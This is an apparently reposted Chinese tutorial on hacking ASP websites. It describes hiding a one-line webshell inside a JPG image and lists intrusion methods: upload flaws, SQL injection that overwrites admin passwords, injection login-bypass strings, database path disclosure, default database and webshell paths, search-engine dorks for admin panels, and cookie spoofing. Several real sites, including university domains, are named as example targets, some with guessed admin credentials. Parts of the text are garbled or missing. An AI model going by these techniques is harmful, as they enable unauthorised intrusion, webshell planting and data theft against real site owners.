aspx连接mysql木马_让你变成ASP木马高手_安全教程_脚本之家
1.名稱:如何制作圖片ASP木馬?(可顯示圖片)
建一個asp文件,內容為
找一個正常圖片ating.jpg,插入一句話木馬(比如冰狐的),用ultraedit進行hex編譯,插入圖片里,為
了運行成功,還要搜索,將其變為00,(不要替換自己asp的),再把jpg文件開頭加入
'
response.write'\'
style=display:none>
最后附上?卡拉是條ok?總結的
1.上傳漏洞[不多講]
pS:?如果看到:選擇你要上傳的文件?[重新上傳]或者出現'請登陸后使用',80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞[不多講]
pS:對MD5密碼.有時我們不是哪么容易跑出來.如果是[SQL數據庫].那么我們可以用以下命令:
http://注入網址;update?admin?set?password=\新MD5密碼\?where?password=\舊MD5密碼\--
[admin為表名.]
3.旁注,也就是跨站.
我們入侵某站時可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務器的站點,然后在利用這個
站點用提權,嗅探等方法來入侵我們?要入侵的站點。,在這里有個難點,就是一些服務器的絕對路徑經
過加密,這就看我們的本事了
4.暴庫:把二級目錄中間的/換成%5c
EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=職責范圍&BigClassType=1
如果你能看到:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一個有效的路徑。?確定路
徑名稱拼寫是否正確,以及是否?連接到文件存放的服務器。
這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行.
5.\or\=\or\這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有:
\or\\=\?'?or?'a'='a?\)?or?(\a\=\a?')?or?('a'='a?or?1=1--?\?or?\a\=\a
6.社會工程學。這個我們都知道吧。就是猜解。
EY:http://www.neu.edu.cn/waishi/admin
admin?waishi
7.寫入ASP格式數據庫。就是一句話木馬[?],常用在留言本.
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個就是ASP格式的數據庫],再寫入一句話
木馬
8.源碼利用:一些網站用的都是網上下載的源碼.有的站長很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
這個站用的是:杰出校友錄,源碼我下過了,
默認數據庫/webshell路徑:databaseliangu_data.mdb?后臺管理:adm_login.asp?密碼及用戶名都是
admin
9.默認數據庫/webshell路徑利用:這樣的網站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網站獵手?挖掘雞
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
10.查看目錄法:人一些網站可以斷開目錄,可以方問目錄。
EY:http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
這樣我們可以找到數據庫,下載不用我教吧
11.工具溢出:.asp?NewsID=?/2j.asp?id=18?.asp?id=[這種方法可以取得大量的WEBSHELL]
12.搜索引擎利用:
(1).inurl:flasher_list.asp?默認數據庫:database/flash.mdb?后臺/manager/
(2).找網站的管理后臺地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理
site:xxxx.cominurl:login
(3).查找access的數據庫,mssql、mysql的連接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。
13.COOKIE欺騙:把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改COOKIE。
這個我就不多講了
14.利用常見的漏洞:如動網BBS
EY:http://js1011.com/bbs/index.asp
可以先用:dvbbs權限提升工具,使自已成為前臺管理員。
THEN,運用:動網固頂貼工具,找個固頂貼,再取得COOKIES,這個要你自已做。我們可以用WSockExpert
取得Cookies/NC包
這個我就不做了,網上教程多的是,自已下個看看。
工具:dvbbs權限提升工具?動網固頂貼工具
15.還有一些老漏洞。如IIS3,4的查看源碼,5的delete
CGI,PHP的一些老洞,我就不說了啊。。太老了。沒有什么大用途。
總結
以上是生活随笔為你收集整理的aspx连接mysql木马_让你变成ASP木马高手_安全教程_脚本之家的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux系统(Centos 7)部署环
- 下一篇: 程序员的算法趣题Q68: 异性相邻的座位